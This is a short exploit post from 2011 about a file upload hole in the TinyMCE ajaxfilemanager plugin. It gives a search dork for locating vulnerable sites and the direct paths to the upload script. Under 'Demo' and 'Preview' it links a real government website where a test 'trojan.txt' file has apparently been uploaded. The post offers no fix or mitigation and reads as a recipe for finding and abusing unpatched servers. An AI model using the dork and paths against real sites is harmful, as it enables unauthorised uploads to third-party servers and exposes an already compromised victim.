######################################################### # Title : TinyMCE ajaxfilemanager Upload Vulnerability # Author: Dr Trojan # Greets to all my friends and everyone i know (www.paksecteam.com) # Vendor: http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/ # Email : urduhack@gmail.com # Date : 29/05/2011 # Dork : "tiny_mce/plugins/ajaxfilemanager" # Category : PHP [File Upload Vulnerability] # Tested on: [Windows 7, Linux Ubuntu] ######################################################### Exploit # http:// [localhost]/[path]/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php # http:// [localhost]/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php # File Extention [.txt],[.jpg],[gif],[bmp] Demo http://sns.yhgs.gov.cn/plugins/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php# Preview http://sns.yhgs.gov.cn/uploaded/temp/trojan.txt